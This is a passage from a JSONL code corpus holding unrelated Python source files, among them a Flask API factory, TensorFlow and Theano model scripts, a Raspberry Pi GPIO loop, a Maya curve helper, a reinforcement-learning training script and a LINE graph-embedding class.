UpdateStockLevelApi,\n GetStockLevelReportApi,\n) # Import defined endpoints created using SwaggerView class\nfrom app.errors import (\n errors,\n) # import blueprint containing error handler for application\n\n\ndef _register_endpoints(app: Flask):\n \"\"\"\n Register all endpoints for this application\n\n Register the endpoints in __init__ to avoid circular references\n \"\"\"\n api_v1 = Blueprint('api_v1', __name__, url_prefix='/api/v1')\n\n # Define routes for stock level endpoints\n api_v1.add_url_rule(\n \"/stocklevel\",\n view_func=UpdateStockLevelApi.as_view(\"UpdateStockLevelApi\"),\n methods=[\"POST\"],\n )\n #############################################\n # Exercise 4: Add GetStockLevelReportApi endpoint ROUTE here\n #############################################\n api_v1.add_url_rule(\n \"/stocklevel\",\n view_func=GetStockLevelReportApi.as_view(\"GetStockLevelReportApi\"),\n methods=[\"GET\"],\n )\n\n\n\n\n # Define routes for example endpoints\n api_v1.add_url_rule(\n \"/address/\",\n view_func=PathParameterExampleApi.as_view(\"PathParameterExampleApi\"),\n methods=[\"GET\"],\n )\n api_v1.add_url_rule(\n \"/user/add\",\n view_func=JsonPayloadExampleApi.as_view(\"JsonPayloadExampleApi\"),\n methods=[\"POST\"],\n )\n api_v1.add_url_rule(\n \"/colour/guess\",\n view_func=QueryParameterExampleApi.as_view(\"QueryParameterExampleApi\"),\n methods=[\"GET\"],\n )\n api_v1.add_url_rule(\n \"/colour/user\",\n view_func=MultiParameterLocationExampleApi.as_view(\n \"MultiParameterLocationExampleApi\"\n ),\n methods=[\"POST\"],\n )\n\n # Register api_v1 blueprint\n app.register_blueprint(api_v1)\n\ndef _initialize_errorhandlers(app: Flask):\n \"\"\"\n Initialize error handlers\n\n Use a blueprint so that you can define application error handlers without circular references\n \"\"\"\n # register error handler blueprint\n app.register_blueprint(errors)\n\n\ndef create_app() -> Flask:\n \"\"\"\n Create an app by initializing components.\n\n args:\n None\n\n returns:\n app (Flask): Flask app object\n \"\"\"\n\n # Create Flask App object\n app = Flask(__name__) # pylint: disable = invalid-name\n\n # Get Flask App config based on environment variable\n config_env = \"config.{}Config\".format(\n os.getenv(\"ENV\", \"Dev\")\n ) # config object as defined in config.py\n app.config.from_object(config_env) # Set to chosen configs\n\n # Swagger Documentation Settings, enable autodocumentation of your APIs\n # produces swagger api webpage under {app_url}/swagger, locally: http://0.0.0.0:5000/swagger (urls can be configured on settings see: https://github.com/flasgger/flasgger\n # full json spec found under {app_url}/apispec_1.json, locally: http://0.0.0.0:5000/apispec_1.json\n swagger = Swagger(app) # pylint: disable = unused-variable\n\n # Add endpoints to application object\n _register_endpoints(app)\n\n # initialise error handlers\n _initialize_errorhandlers(app)\n\n return app\n","sub_path":"flask-app/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"128110247","text":"from tf_cnn_siamese.model import *\nimport tf_cnn_siamese.data_preparation as dp\nimport time\nimport sys\n\n\ndef naive_predict(x1, x2, path):\n \"\"\"\n runs the full model (feature extraction and difference metric)\n :param x1: image 1\n :param x2: image 2\n :param path: file path for checkpoint\n :return:\n \"\"\"\n tf.reset_default_graph()\n conv_weights, conv_biases, fc_weights, fc_biases = initialize_weights()\n saver = tf.train.Saver()\n feed_1, feed_2 = dp.predict_inputs_placeholders()\n out_node = construct_full_model(feed_1, feed_2, conv_weights, conv_biases, fc_weights, fc_biases)\n with tf.Session() as sess: # automatic tear down of controlled execution\n print(\"\\n\")\n tf.global_variables_initializer().run()\n print(\"Data Format \" + conf.DATA_FORMAT)\n cuda_enabled = ('NCHW' == conf.DATA_FORMAT)\n print(\"CUDA Enabled: \" + str(cuda_enabled))\n saver.restore(sess, path)\n feed_dict = {feed_1: x1, feed_2:x2}\n out = sess.run(out_node, feed_dict)\n return out\n\n\ndef extract_features(x1, x2, path):\n \"\"\"\n extracts two set of features from two images\n :param x1: image 1\n :param x2: iamge 2\n :param path: file path for checkpoint\n :return: feature sets for both\n \"\"\"\n tf.reset_default_graph()\n conv_weights, conv_biases, fc_weights, fc_biases = initialize_weights()\n saver = tf.train.Saver()\n feed_1, feed_2 = dp.predict_inputs_placeholders()\n features_1_node = construct_cnn(feed_1, conv_weights, conv_biases, fc_weights, fc_biases)\n features_2_node = construct_cnn(feed_2, conv_weights, conv_biases, fc_weights, fc_biases)\n with tf.Session() as sess: # automatic tear down of controlled execution\n print(\"\\n\")\n tf.global_variables_initializer().run()\n print(\"Data Format \" + conf.DATA_FORMAT)\n cuda_enabled = ('NCHW' == conf.DATA_FORMAT)\n print(\"CUDA Enabled: \" + str(cuda_enabled))\n saver.restore(sess, path)\n feed_dict_1 = {feed_1: x1}\n feed_dict_2 = {feed_2: x2}\n out_1 = sess.run(features_1_node, feed_dict_1)\n out_2 = sess.run(features_2_node, feed_dict_2)\n return out_1, out_2\n\n\ndef predict_with_features(features_1, features_2, path):\n \"\"\"\n gets model prediction using extracted features\n :param features_1: features from first image\n :param features_2: features from second image\n :param path: file path for checkpoint\n :return: probability of positive\n \"\"\"\n tf.reset_default_graph()\n _, _, fc_weights, fc_biases = initialize_weights()\n saver = tf.train.Saver()\n feed_1, feed_2 = dp.predict_features_placeholders()\n predict_node = construct_joined_model(feed_1, feed_2, fc_weights, fc_biases)\n with tf.Session() as sess: # automatic tear down of controlled execution\n print(\"\\n\")\n tf.global_variables_initializer().run()\n print(\"Data Format \" + conf.DATA_FORMAT)\n cuda_enabled = ('NCHW' == conf.DATA_FORMAT)\n print(\"CUDA Enabled: \" + str(cuda_enabled))\n saver.restore(sess, path)\n feed_dict = {feed_1: features_1, feed_2: features_2}\n out = sess.run(predict_node, feed_dict)\n return out\n\n\ndef test_model_prediction():\n path = input(\"enter path:\")\n tset1, tset2, ty, _, _, _ = dp.get_mnist_dataset()\n x1 = tset1[0:1]\n x2 = tset2[0:1]\n y = ty[0]\n naive = naive_predict(x1, x2, path)\n features_1, features_2 = extract_features(x1, x2, path)\n streamlined = predict_with_features(features_1, features_2, path)\n print(\"Actual: \" + str(y))\n print(\"Naive: \" + str(naive))\n print(\"Streamlned: \" + str(streamlined))\n\n\ndef time_cnn_feature_extraction():\n \"\"\"\n tests the running time of one twin network doing feature extraction\n :return: None\n \"\"\"\n tf.reset_default_graph()\n tset1, tset2, ty, vset1, vset2, vy = dp.get_mnist_dataset()\n conv_weights, conv_biases, fc_weights, fc_biases = initialize_weights()\n # creates session\n saver = tf.train.Saver()\n feed_1, feed_2, labels = dp.test_inputs_placeholders()\n cnn = construct_cnn(feed_1, conv_weights, conv_biases, fc_weights, fc_biases)\n with tf.Session() as sess: # automatic tear down of controlled execution\n print(\"\\n\")\n tf.global_variables_initializer().run()\n print(\"Data Format \" + conf.DATA_FORMAT)\n cuda_enabled = ('NCHW' == conf.DATA_FORMAT)\n print(\"CUDA Enabled: \" + str(cuda_enabled))\n if input(\"resume from previous session (y/n):\") == \"y\":\n path = input(\"enter path:\")\n saver.restore(sess, path)\n start_time = time.time()\n # iterates through the training data in batch\n data_size = tset1.shape[0]\n total = data_size\n num_steps = total // conf.TEST_BATCH_SIZE\n for step in range(num_steps):\n # offset of the current minibatch\n offset = (step * conf.TEST_BATCH_SIZE) % (data_size - conf.TEST_BATCH_SIZE)\n batch_x1 = tset1[offset:(offset + conf.TEST_BATCH_SIZE), ...]\n # maps batched input to graph data nodes\n feed_dict = {feed_1: batch_x1}\n # runs the optimizer every iteration\n sess.run(cnn, feed_dict=feed_dict)\n # prints loss and validation error when evalidating intermittently\n elapsed_time = time.time() - start_time\n print('\\n%.4f s' % elapsed_time)\n print(\"Size: \" + str((ty.shape[0])))\n expected = elapsed_time * 137374 / ty.shape[0]\n print(\"Expected Feature Extraction Time for 137,374 Unicode: \" + str(expected))\n sys.stdout.flush()\n\n\ndef time_joined_difference():\n \"\"\"\n tests the running time of the joined network running on extracted features\n :return: None\n \"\"\"\n tf.reset_default_graph()\n num_pairs = 100000\n features_1, features_2 = dp.generate_features(num_pairs)\n _, _, fc_weights, fc_biases = initialize_weights()\n feed_1, feed_2 = dp.test_features_placeholders()\n # creates session\n saver = tf.train.Saver()\n out = construct_joined_model(feed_1, feed_2, fc_weights, fc_biases)\n with tf.Session() as sess: # automatic tear down of controlled execution\n print(\"\\n\")\n tf.global_variables_initializer().run()\n print(\"Data Format \" + conf.DATA_FORMAT)\n cuda_enabled = ('NCHW' == conf.DATA_FORMAT)\n print(\"CUDA Enabled: \" + str(cuda_enabled))\n if input(\"resume from previous session (y/n):\") == \"y\":\n path = input(\"enter path:\")\n saver.restore(sess, path)\n start_time = time.time()\n # iterates through the training data in batch\n total = num_pairs\n num_steps = total // conf.TEST_BATCH_SIZE\n for step in range(num_steps):\n # offset of the current minibatch\n offset = (step * conf.TEST_BATCH_SIZE) % (num_pairs - conf.TEST_BATCH_SIZE)\n batch_x1 = features_1[offset:(offset + conf.TEST_BATCH_SIZE), ...]\n batch_x2 = features_2[offset:(offset + conf.TEST_BATCH_SIZE), ...]\n # maps batched input to graph data nodes\n feed_dict = {feed_1: batch_x1, feed_2: batch_x2}\n # runs the optimizer every iteration\n sess.run(out, feed_dict=feed_dict)\n # prints loss and validation error when evalidating intermittently\n elapsed_time = time.time() - start_time\n print('\\n%.4f s' % elapsed_time)\n print(\"Size: \" + str(num_pairs))\n expected = elapsed_time * 9435739251 / num_pairs\n print(\"Expected Feature Extraction Time for 10B Pairs: \" + str(expected))\n sys.stdout.flush()\n\n\nif __name__ == \"__main__\":\n test_model_prediction()\n","sub_path":"tf_cnn_siamese/deployment_tests.py","file_name":"deployment_tests.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"598799998","text":"import RPi.GPIO as GPIO\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(17, GPIO.IN)\nGPIO.setup(18, GPIO.IN)\nGPIO.setup(20, GPIO.OUT)\nGPIO.setup(21, GPIO.OUT)\n\n \n\ndef f_input(**input):\n for name, value in input.items():\n print(\"%s = %d\" %(name, value))\n## print(\"{} = {}\" .format(name, value))\n \n\nwhile True:\n \n #\n X1 = GPIO.input(17)\n X2 = GPIO.input(18)\n \n A = {\"R_DIO_X1\" : X1, \"R_DIO_X2\" : X1, \"R_DIO_X3\" : X2, \"R_DIO_X4\" : X2}\n f_input(**A)\n \n\n\n\n","sub_path":"Source code/Python/che_func_kwarg.py","file_name":"che_func_kwarg.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"606960937","text":"import maya.cmds as cmds\ndef createShape(prefix='', scale=1.0):\n \n List = []\n List.append(cmds.curve(n=prefix, p=[(-1.0, 0.0, 0.0), (-1.0, 0.0, 2.0), (1.0, 0.0, 2.0), (1.0, 0.0, 0.0), (2.0, 0.0, 0.0), (0.0, 0.0, -2.0), (-2.0, 0.0, 0.0), (-1.0, 0.0, 0.0)],per = False, d=1, k=[0, 1, 2, 3, 4, 5, 6, 7]))\n for x in range(len(List)-1):\n cmds.makeIdentity(List[x+1], apply=True, t=1, r=1, s=1, n=0)\n shapeNode = cmds.ListRelatives(List[x+1], shapes=True)\n cmds.parent(shapeNode, List[0], add=True, s=True)\n cmds.delete(List[x+1])\n\n sel = List[0]\n\n cmds.setAttr(sel + '.s', scale, scale, scale)\n\n cmds.makeIdentity(sel, apply=1, t=1, r=1, s=1, n=0)\n\n return sel\n\n","sub_path":"CustomProceduralRiggingTool/CustomProceduralRigTool/rigLib/base/controlShape/ArrowCurve.py","file_name":"ArrowCurve.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"186370080","text":"\"\"\"\nTrain an agent to solve the Quanser Qube environment using Episodic Measure-Valued Derivatives.\n\"\"\"\nfrom pyrado.algorithms.emvd import EMVD\nfrom pyrado.algorithms.torchdistributions import GaussianDiagonalLogStdParametrization, GaussianDiagonal\nfrom pyrado.environment_wrappers.action_normalization import ActNormWrapper\nfrom pyrado.environments.pysim.quanser_qube import QQubeSim\nfrom pyrado.logger.experiment import setup_experiment, save_list_of_dicts_to_yaml\nfrom pyrado.policies.environment_specific import QQubeSwingUpAndBalanceCtrl\nfrom pyrado.policies.features import FeatureStack, identity_feat, sign_feat, abs_feat, squared_feat, qubic_feat, \\\n bell_feat, RandFourierFeat, MultFeat\nfrom pyrado.policies.linear import LinearPolicy\nimport torch as to\nimport numpy as np\n\n\nif __name__ == '__main__':\n # Experiment (set seed before creating the modules)\n # ex_dir = setup_experiment(QQubeSim.name, PoWER.name, f'{LinearPolicy}_actnorm', seed=1)\n ex_dir = setup_experiment(QQubeSim.name + 'swing', EMVD.name, QQubeSwingUpAndBalanceCtrl.name, seed=2)\n\n # Environment\n env_hparams = dict(dt=1/500., max_steps=5000)\n env = QQubeSim(**env_hparams)\n # env = ActNormWrapper(env)\n\n # Search distribution\n # init_loc = np.array([np.log(0.02), np.log(50.), 0.3],\n # dtype=np.float64)\n # init_std = 1.0 * np.ones(init_loc.shape[0], dtype=np.float64)\n\n init_loc = np.array([np.exp(-2.6142373),\n np.exp(2.6333313),\n 0.3],\n dtype=np.float64)\n init_std = 0.5 * np.ones(init_loc.shape[0], dtype=np.float64)\n\n dist = GaussianDiagonalLogStdParametrization(init_loc=init_loc, init_std=init_std)\n # dist = GaussianDiagonal(init_loc=init_loc, init_std=init_std)\n\n # Policy\n policy_hparam = dict(\n ref_energy=init_loc[0],\n energy_gain=init_loc[1],\n # energy_th_gain=0.3, # This parameter is fixed.\n energy_th_gain=init_loc[2], # This parameter is fixed.\n acc_max=5.,\n alpha_max_pd_enable=10.,\n pd_gains=to.tensor([-1.7313308, 35.976177, -1.58682, 3.0102878], dtype=to.float64)\n )\n policy = QQubeSwingUpAndBalanceCtrl(env.spec, **policy_hparam, only_swingup_control=True)\n\n # Set the policy parameters to the initial ones...\n policy.param_values = to.tensor(init_loc)\n\n # Algorithm\n algo_hparam = dict(\n max_iter=50,\n pop_size=1,\n num_rollouts=1,\n expl_std_init=1.0,\n expl_std_min=0.0,\n num_sampler_envs=16,\n n_mc_samples_gradient=1,\n coupling=True,\n lr=1e-1,\n optim='Adam'\n )\n\n\n algo = EMVD(ex_dir, env, policy, dist, **algo_hparam)\n\n # Save the hyper-parameters\n save_list_of_dicts_to_yaml([\n dict(env=env_hparams, seed=ex_dir.seed),\n dict(policy=policy_hparam),\n dict(algo=algo_hparam, algo_name=algo.name)],\n ex_dir\n )\n\n # Jeeeha\n algo.train(seed=ex_dir.seed, snapshot_mode='best')\n","sub_path":"Pyrado/scripts/training/qq-swing_mvd.py","file_name":"qq-swing_mvd.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"286412967","text":"from django.core.management.base import BaseCommand, CommandError\nfrom corehq.apps.users.models import CouchUser\n\n\nclass Command(BaseCommand):\n help = \"Syncs the users in a domain from CouchDB to PostgresSQL.\"\n args = ''\n\n def handle(self, *args, **options):\n if len(args) != 1:\n raise CommandError('Usage is sync_couch_users_to_sql %s' % self.args)\n\n domain = args[0].strip()\n\n users = CouchUser.by_domain(domain)\n for user in users:\n user.save()\n","sub_path":"corehq/apps/domainsync/management/commands/sync_couch_users_to_sql.py","file_name":"sync_couch_users_to_sql.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"473707365","text":"import ontquery as oq\nfrom pyontutils.core import OntTerm\nimport os\n\ndef remote(server=''):\n\n # Request interlex remote (scigraph is also an option for plugins)\n InterLexRemote = oq.plugin.get('InterLex')\n\n if server:\n server = server if server.endswith('.') else server + '.'\n endpoint = f'https://{server}scicrunch.org/api/1/'\n\n #\n interlex_remote = InterLexRemote()\n\n # setup inheritance classes\n interlex_remote.apiEndpoint = endpoint\n interlex_remote.setup(instrumented=OntTerm)\n\n return interlex_remote\n","sub_path":"ilxutils/ilxutils/remotes.py","file_name":"remotes.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"342779723","text":"import numpy as np\nfrom .node import Node\n\nclass Forest:\n def __init__(self, nodes):\n self.trees = nodes\n def get_closest_point(self, point, space):\n closest = self.trees[0]\n smallest_dist = np.linalg.norm(\n space.vec(closest.coords, point)\n )\n for tree in self.trees:\n temp = tree.get_closest_point(point, space)\n if temp[1] < smallest_dist:\n closest = temp[0]\n smallest_dist = temp[1]\n return(closest, smallest_dist)\n def get_all_children(self):\n all_children = []\n for tree in self.trees:\n all_children.extend(tree.get_all_children())\n return(all_children)\n def grow(self, bo, eps, max_e, space):\n boundlength = space.bounds[1,:] - space.bounds[0,:]\n dim = bo.dim\n new_point = np.random.random(dim) * boundlength + space.bounds[0,:]\n new_e = bo.get_mu(np.vstack(np.atleast_2d(new_point)))[0,0]\n if new_e < max_e:\n closest, dist = self.get_closest_point(new_point, space)\n new_point = space.trace(closest.coords, new_point, bo, eps, max_e)\n if not np.prod(new_point == closest.coords):\n closest.children.append(Node(new_point, closest))\n def get_random_child(self):\n all_children = self.get_all_children()\n return(np.random.choice(all_children, size=1)[0])\n def merge(self, other_forest):\n for tree in other_forest.trees:\n self.trees.append(tree)\n def test_connectivity_once(self, forest_B, bo, space, eps, max_e):\n random_A = self.get_random_child()\n closest_B, dist = forest_B.get_closest_point(random_A.coords, space)\n endpoint = space.trace(random_A.coords, closest_B.coords, bo,\n eps, max_e)\n if np.prod(endpoint == closest_B.coords):\n return([random_A, closest_B])\n else:\n return(None)\n\n","sub_path":"boss/mep/forest.py","file_name":"forest.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"484768322","text":"from engine import *\nimport tensorflow as tf\nfrom tensorflow import keras\n#from keras.models import Model\n#from keras.layers import Dense, Dropout\n\n#from keras.applications.mobilenet import MobileNet\n#from keras.applications.mobilenet import preprocess_input as preprocess_input_mob\n\nfrom utils.score_utils import mean_score, std_score\n\n\n# Example:\n# fitness function for nima classifier\ndef nima_classifier(**kwargs):\n # read parameters\n population = kwargs.get('population')\n generation = kwargs.get('generation')\n tensors = kwargs.get('tensors')\n f_path = kwargs.get('f_path')\n objective = kwargs.get('objective')\n _resolution = kwargs.get('resolution')\n _stf = kwargs.get('stf')\n \n images = True\n\n \n\n fn = f_path + \"gen\" + str(generation).zfill(5)\n fitness = []\n best_ind = 0\n\n # set objective function according to min/max\n fit = 0\n if objective == 'minimizing':\n condition = lambda: (fit < max_fit) # minimizing\n max_fit = float('inf')\n else:\n condition = lambda: (fit > max_fit) # maximizing\n max_fit = float('-inf')\n\n\n number_tensors = len(tensors)\n with tf.device('/CPU:0'):\n\n # NIMA classifier\n x = np.stack([tensors[index].numpy() for index in range(number_tensors)], axis = 0)\n #x = keras.applications.mobilenet.preprocess_input_mob(x)\n x = keras.applications.mobilenet.preprocess_input(x)\n scores = model.predict(x, batch_size = number_tensors, verbose=0)\n #scores = model.predict()\n \n # scores\n for index in range(number_tensors):\n\n if generation % _stf == 0:\n save_image(tensors[index], index, fn) # save image\n\n mean = mean_score(scores[index])\n std = std_score(scores[index])\n # fit = mean - std\n fit = mean\n\n if condition():\n max_fit = fit\n best_ind = index\n fitness.append(fit)\n population[index]['fitness'] = fit\n\n # save best indiv\n if images:\n save_image(tensors[best_ind], best_ind, fn, addon='_best')\n return population, population[best_ind]\n\n\nif __name__ == \"__main__\":\n\n # GP params\n seed = random.randint(0, 2147483647)\n resolution = [128, 128, 3]\n dev = '/gpu:0' # device to run, write '/cpu_0' to tun on cpu\n number_generations = 20\n\n # build function and terminal sets according to resolution\n dim = len(resolution)\n build_function_set(function_set)\n build_terminal_set(dim, resolution, dev)\n\n # NIMA example\n base_model = keras.applications.MobileNet((None, None, 3), alpha=1, include_top=False, pooling='avg', weights=None)\n x = keras.layers.Dropout(0.75)(base_model.output)\n x = keras.layers.Dense(10, activation='softmax')(x)\n model = keras.models.Model(base_model.input, x)\n model.load_weights('weights/weights_mobilenet_aesthetic_0.07.hdf5')\n\n\n # create engine\n engine = Engine(fitness_func = nima_classifier,\n population_size = 30,\n tournament_size = 3,\n mutation_rate = 0.1,\n crossover_rate = 0.9,\n max_tree_depth = 20,\n target_dims=resolution,\n method='ramped half-and-half',\n objective='maximizing',\n device=dev,\n stop_criteria='generation',\n stop_value=number_generations,\n immigration=10000,\n seed = seed,\n debug=0,\n save_to_file=10,\n save_graphics=True,\n show_graphics=False,\n read_init_pop_from_file=None)\n # run evolutionary process\n engine.run()\n\n # A file can be loaded by specifing the \"read_init_pop_from_file\" variable:\n # read_init_pop_from_file = 'population_example.txt'\n","sub_path":"TensorGP-master/Old_scripts/nima_example.py","file_name":"nima_example.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"241509604","text":"# from neo4jrestclient.client import GraphDatabase\n# import json\nimport sqlite3\nfrom sqlite3 import Error\n\n#\n# def populate_dataset(intent,l_item,l_query):\n# conn = sqlite3.connect('tags.db')\n# c = conn.cursor()\n# c.execute('''Create TABLE if not exists tag_data (intent TEXT,tag TEXT,query TEXT)''')\n# for tag,query in zip(l_item,l_query):\n#\n# if query!=[]:\n# c.execute(\"INSERT INTO tag_data VALUES(?,?,?)\", (intent,tag,query))\n# else:\n# print(\"iam tag\",tag)\n# continue\n# conn.commit()\n# conn.close()\n# return 0\n#\n# def prepare_query(intent):\n# #q = 'match(n:{}) -[r:invokes]->(m) Return n,r,m'.format(intent)\n# q='MATCH (n:{})-[r:invokes]->(m) RETURN n.intent,m.intent'.format(intent)\n# return q\n#\n# def tag_generate(intent):\n# tags=[]\n# n=0\n#\n# db = GraphDatabase(\"http://localhost:7474\", username=\"neo4j\", password=\"subodh\")\n# results = db.query(prepare_query(intent))\n# for r in results:\n# tags.append(r[1])\n# return tags\n#\n#\n#\n# def prepare_tags():\n# with open('tnt.json', mode='r',encoding='UTF-8') as feedsjson:\n# feeds=json.load(feedsjson)\n# dictionary_item=feeds[\"intents\"]\n#\n# for item in dictionary_item:\n# tags=tag_generate(item[\"intent\"])\n# possible_query=generate_query(tags)\n# print(tags,possible_query)\n#\n# populate_dataset(item[\"intent\"],tags,possible_query)\n# return 0\n#\n# def generate_query(tags):\n# possible_query=[]\n# list_item=[]\n# with open('tnt.json', mode='r',encoding='UTF-8') as feedsjson:\n# feeds=json.load(feedsjson)\n# dictionary_item=feeds[\"intents\"]\n# for item in dictionary_item:\n# list_item.append(item[\"intent\"])\n#\n# for tag in tags:\n# for item in dictionary_item:\n# if tag==item[\"intent\"] and tag in list_item:\n# print(\"how are you?\")\n# possible_query.append(item[\"query\"][0])\n#\n# elif tag not in list_item:\n# possible_query.append('')\n# break\n#\n#\n#\n# return possible_query\n\n\ndef generate_possible_query(intent):\n possible_query=[]\n print(intent)\n default_list=['About Ashley','Her Contacts']\n\n conn = sqlite3.connect('chat/chatModel/tags.db')\n\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM tag_data WHERE intent=?\", (intent,))\n\n rows = cur.fetchall()\n\n\n for row in rows:\n possible_query.append(row[2])\n print(\"iam the possible query\",possible_query)\n if possible_query==[]:\n\n print(\"iam possible_qureey inside\")\n return default_list\n else:\n print(\"iam here man\")\n return possible_query\n\n\n# generate_query(['subodh'])\n# generate_query(['her_offer'])\n# #prepare_tags()\n# import json\n# def prepare_tags():\n# with open('tnt.json', mode='r',encoding='UTF-8') as feedsjson:\n# feeds=json.load(feedsjson)\n# dictionary_item=feeds[\"intents\"]\n# print(dictionary_item)\n# for item in dictionary_item:\n# print(item[\"intent\"])\n\n#prepare_tags()\n\n\n","sub_path":"chat/chatModel/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"392462212","text":"import numpy as np\nimport theano\nimport theano.tensor as tensor\nfrom theano import config\n\nfrom theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams\n\nfrom collections import OrderedDict\n#from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams\n\n#from utils import dropout, numpy_floatX\nfrom utils import uniform_weight, zero_bias\n\nfrom gru_layers_modify_sep_10 import param_init_decoder_modify_sep_10, decoder_layer_modify_sep_10\n\nimport pdb\n\ntrng = RandomStreams(123)\n\n# Set the random number generators' seeds for consistency\nSEED = 123 \nnp.random.seed(SEED)\n\ndef v_dk(beta):\n betas = np.array([0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])\n vs = np.array([-.33, -.472, -.631, -.792, -.953, -1.11, -1.29, -1.49, -1.74, -2.10, -10])\n from scipy.interpolate import interp1d\n return interp1d(betas, vs)(beta)\n\n\"\"\" init. parameters. \"\"\" \ndef init_params_modify_sep_10(options, beta):\n# changed \n n_x = options['n_x'] \n n_h = options['n_h']\n \n params = OrderedDict()\n params = param_init_decoder_modify_sep_10(beta, options,params)\n \n Vhid = uniform_weight(n_h,n_x)\n Vhid_combined = np.zeros([2]+list(Vhid.shape))\n Vhid_combined[0, :] = Vhid\n #Vhid_combined[1, :] = np.random.randn(np.product(Vhid.shape)).reshape(Vhid.shape) * .001\n Vhid_combined[1, :] = v_dk(beta)\n params['Vhid'] = Vhid_combined\n \n bhid = zero_bias(n_x)\n bhid_combined = np.zeros([2]+list(bhid.shape))\n bhid_combined[0, :] = bhid\n #bhid_combined[1, :] = np.random.randn(np.product(bhid.shape)).reshape(bhid.shape) * .001\n bhid_combined[1, :] = v_dk(beta)\n params['bhid'] = bhid_combined \n\n return params\n\ndef init_tparams(params):\n# no change\n tparams = OrderedDict()\n for kk, pp in params.iteritems():\n tparams[kk] = theano.shared(params[kk], name=kk)\n return tparams\n \n\"\"\" Building model... \"\"\"\n'''\ndef sample(mu, sig):\n \n r = trng.normal(mu.eval().shape, avg = 0.0, std = 1.0, \n dtype=theano.config.floatX)\n #sig = 10 ** nu\n return r * sig + mu\n'''\ndef sample(mu, nu):\n \n r = trng.normal(mu.eval().shape, avg = 0.0, std = 1.0, \n dtype=theano.config.floatX)\n sig = 10 ** nu\n return r * sig + mu\n\ndef build_model_modify_sep_10(tparams,options):\n \n #trng = RandomStreams(SEED)\n \n # Used for dropout.\n #use_noise = theano.shared(numpy_floatX(0.))\n\n # x: n_steps * n_x\n x = tensor.matrix('x', dtype=config.floatX) \n n_steps = x.shape[0] \n \n h_decoder = decoder_layer_modify_sep_10(tparams, x)\n \n #h_decoder_printed = theano.printing.Print('h_decoder: ')(h_decoder)\n \n ###############################################################################\n '''\n def sample(mu, nu):\n \n r = trng.normal(mu.eval().shape, avg = 0.0, std = 1.0, \n dtype=theano.config.floatX)\n sig = 10 ** nu\n return r * sig + mu\n '''\n #def sample(mu, nu):\n\n tparams_Vhid = sample(tparams['Vhid'][0], tparams['Vhid'][1])\n tparams_bhid = sample(tparams['bhid'][0], tparams['bhid'][1])\n #pdb.set_trace()\n ############################################################################### \n \n #pred = tensor.nnet.sigmoid(tensor.dot(h_decoder,tparams['Vhid']) + tparams['bhid'])\n pred = tensor.nnet.sigmoid(tensor.dot(h_decoder,tparams_Vhid) + tparams_bhid)\n \n #pred = theano.printing.Print('pred: ')(pred)\n #pdb.set_trace()\n f_pred = theano.function([x], pred)\n #pdb.set_trace()\n \n cost = tensor.sum(tensor.nnet.binary_crossentropy(pred, x))/n_steps \n\n return x, f_pred, cost\n","sub_path":"rnn_music/model/gru_model_modify_sep_10.py","file_name":"gru_model_modify_sep_10.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"576541461","text":"import os\nimport subprocess\nfrom typing import List\n\nimport config\nimport entities.graphs.graph as g\nimport memory_access.memory_access as ma\nimport entities.embeddings.embedding as emb\nimport gensim\n\n\nclass Line(emb.Embedding):\n\n def __init__(self, dim: int = 128, threshold: int = 1000, depth: int = 2):\n assert (dim % 2 == 0) # will be devided by 2\n self.dim: int = dim # 2 embeddings will be created and added together each emb has size dim\n self.threshold = threshold\n self.depth = depth\n\n def __str__(self):\n return f'LINE-dim={self.dim}_depth={self.depth}_threshold={self.threshold}'\n\n def short_name(self) -> str:\n return \"LINE\"\n\n def train_embedding(self, graph: g.Graph, memory_access: ma.MemoryAccess, removed_nodes: [int]):\n super().train_embedding(graph=graph, memory_access=memory_access, removed_nodes=removed_nodes)\n\n if memory_access.has_embedding(emb_func_name=str(self), graph_name=str(graph), removed_nodes=removed_nodes):\n # embedding is already trained\n return\n\n dense_edge_list = self.__get_preprocessed_edge_list(removed_nodes=removed_nodes, graph=graph,\n mem_acc=memory_access)\n\n target_emb_path_file = self.__train_embedding(dense_edge_list_file_path=dense_edge_list,\n mem_acc=memory_access, removed_nodes=removed_nodes, graph=graph)\n os.remove(dense_edge_list)\n\n self.__change_embedding_emb_format_to_csv(target_emb_path_file=target_emb_path_file, graph=graph,\n removed_nodes=removed_nodes, mem_acc=memory_access)\n\n def __change_embedding_emb_format_to_csv(self, target_emb_path_file: str, graph: g.Graph, removed_nodes: List[int],\n mem_acc: ma.MemoryAccess):\n assert (target_emb_path_file.endswith(\".emb\"))\n model = gensim.models.keyedvectors.KeyedVectors.load_word2vec_format(target_emb_path_file, binary=True)\n mem_acc.save_gensim_embedding(trained_emb=model, emb_func_name=str(self), graph_name=str(graph),\n 